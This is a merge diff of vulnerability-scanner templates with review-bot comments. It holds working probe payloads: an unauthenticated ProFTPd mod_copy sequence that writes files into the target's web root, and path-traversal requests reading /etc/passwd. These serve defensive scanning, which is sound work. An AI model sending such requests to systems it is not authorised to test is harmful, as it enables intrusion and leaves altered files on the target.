Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
f343a4d311
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 |
|
| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 |
|
||||||
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
|
| exposures | 63 | technologies | 50 | misconfiguration | 54 |
|
||||||
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
|
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**75 directories, 712 files**.
|
**75 directories, 716 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -9,6 +9,7 @@ requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2015-3306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ProFTPd RCE
|
||||||
|
author: pd-team
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/t0kx/exploit-CVE-2015-3306
|
||||||
|
tags: cve,cve2015,ftp,rce,network
|
||||||
|
|
||||||
|
network:
|
||||||
|
- inputs:
|
||||||
|
- data: "site cpfr /proc/self/cmdline\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpto /tmp/.{{randstr}}\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpfr /tmp/.{{randstr}}\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpto /var/www/html/{{randstr}}\r\n"
|
||||||
|
host:
|
||||||
|
- "{{Hostname}}:21"
|
||||||
|
|
||||||
|
read-size: 1024
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Copy successful"
|
||||||
|
part: raw
|
|
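Review bot: The four `site cpfr` / `site cpto` inputs make this a state-changing check, and nothing in `info` says so. No login is sent, and a match means a file was copied to `/tmp/.{{randstr}}` and then to `/var/www/html/{{randstr}}` on the scanned host, where it stays because the template has no cleanup step. Add a `description:` that states this, and add `intrusive` to `tags` so the template can be excluded from scans of production systems. `severity: high` also looks low for a template named "ProFTPd RCE" that needs no credentials; consider `severity: critical`.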
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2018-18778
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: mini_httpd Path Traversal
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
||||||
|
tags: cve,cve2018,lfi
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |+
|
||||||
|
GET /etc/passwd HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Length: 4
|
||||||
|
|
||||||
|
unsafe: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
|
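Review bot: The empty `Host:` header and `unsafe: true` in the raw request appear to be what the check depends on, but nothing explains them. This same commit adds `Host: {{Hostname}}` to another template, so a later cleanup could apply the same "fix" here and silently break detection. Add a comment above the request such as `# Host is left empty on purpose; do not replace with {{Hostname}}`, and a `description:` in `info` summarising the affected mini_httpd behaviour. The `regex` matcher has no `part:`; writing `part: body` would make the intended scope explicit.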
@ -33,6 +33,7 @@ requests:
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
Upgrade-Insecure-Requests: 1
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -11,6 +11,7 @@ requests:
|
||||||
- "{{BaseURL}}/IdentityGuardSelfService/"
|
- "{{BaseURL}}/IdentityGuardSelfService/"
|
||||||
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
|
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
redirects: true
|
redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: circleci-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: circleci config.yml exposure
|
||||||
|
author: geeknik
|
||||||
|
severity: low
|
||||||
|
reference: https://circleci.com/docs/2.0/sample-config/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 3
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.circleci/config.yml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'regex("^version: ", body) && contains(body, "jobs:") == true'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
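Review bot: In the `dsl` matcher, `regex("^version: ", body)` only matches when `version:` is at the very start of the response, assuming the pattern is compiled without multi-line mode. A config that begins with a comment, a blank line or `---` would then be missed; `(?m)^version: ` anchors per line instead. The trailing `== true` binds only to `contains(...)` and is redundant, so `'regex("(?m)^version: ", body) && contains(body, "jobs:")'` reads more clearly. `info` also has no `tags:` line, unlike the CVE templates added in this commit.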
@ -0,0 +1,26 @@
|
||||||
|
id: circleci-ssh-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: circleci ssh-config exposure
|
||||||
|
author: geeknik
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 3
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.circleci/ssh-config"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Host"
|
||||||
|
- "HostName"
|
||||||
|
- "IdentityFile"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
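Review bot: In the `word` matcher, `"Host"` is a substring of `"HostName"`, so with `condition: and` the first word never changes the result. The match then rests on `HostName` and `IdentityFile` appearing anywhere in a 200 response, which a documentation page mentioning those keywords would also satisfy. Drop `- "Host"`, or use a line-anchored regex matcher such as `(?m)^\s*IdentityFile\s+\S+` to reduce false positives. `info` has no `reference:` or `tags:`, unlike the other templates added here; a one-line `description:` naming what the exposed file can reveal (hostnames, key file paths) would help triage.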
@ -46,8 +46,8 @@ requests:
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||||
Accept-Language: en-US,en;q=0.9
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
name: iis-scan
|
|
||||||
dsl:
|
dsl:
|
||||||
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
|
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
|
||||||
|
|
|
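Review bot: The `dsl` expression `status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404` mixes `&&` and `||` without parentheses, so the reader has to rely on operator precedence. This matters more now that `req-condition: true` is added, since this expression decides the match. Write the grouping out: `"(status_code_1 != 404 && status_code_2 == 404) || (status_code_3 != 404 && status_code_4 == 404)"`. The requests these indices refer to begin outside the hunk.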
@ -19,6 +19,7 @@ requests:
|
||||||
GET /testing-put.txt HTTP/1.1
|
GET /testing-put.txt HTTP/1.1
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
name: multi-req
|
name: multi-req
|
||||||
|
|